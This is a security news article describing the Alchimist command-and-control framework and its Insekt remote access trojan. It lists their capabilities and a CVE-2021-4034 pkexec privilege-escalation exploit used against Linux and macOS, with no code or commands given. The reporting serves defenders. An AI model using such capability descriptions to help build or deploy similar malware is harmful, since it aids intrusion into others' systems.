A new command-and-control (C2) framework and attack vector has been introduced recently, called ‘Alchimist’, used for targeting several operating systems, including Windows, Linux, and macOS. This new framework comprises 64-bit executables written in Go-lang, allowing threat actors to utilise it against different OS more effortlessly.
Based on the analysis, the Alchimist attack framework has a web-based UI with simplified Chinese as its primary language set. The framework’s easy-to-use interface allows threat actors to generate and configure malicious payloads to be injected into targeted computers, which will subsequently help them to take screenshots, perform remote shellcode execution, and run arbitrary commands.
Moreover, Alchimist supports building custom infection procedures for threat actors who opt to drop the Insekt RAT (Remote Access Trojan) on the targeted devices. It also helps the threat actors to generate PowerShell for the Windows OS and wget for the Linux OS, which are code snippets for deploying RATs.
The Alchimist attack framework and the Insekt RAT work hand in hand to infect targeted devices effectively.
Researchers detailed the malicious behaviours of the Insekt RAT that it can execute, including obtaining file sizes and OS info, running arbitrary commands, upgrading itself, taking screenshots, and staying dormant as commanded. This RAT can also be a proxy using SOCKS5, manipulate SSH keys, execute shellcode, perform port and IP scans, and write or unzip disk files.
On the other hand, the Insekt RAT cannot infect macOS yet. Hence, threat operators use a Mach-O file, a Go-lang-based 64-bit executable containing an exploit for the vulnerability CVE-2021-4034. This vulnerability is a privilege escalation flaw on the Polkit system software’s pkexec utility, a utility which the hackers need to install to make the attack work. The same exploit is also offered for the Linux OS as long as the pkexec utility has been installed.
The Alchimist attack framework is specially curated for low-skilled threat actors interested in launching highly sophisticated cyberattacks. With its ready-made capabilities and rich features, threat actors would find this tool valuable, which is, on the other hand, a great concern for threat experts.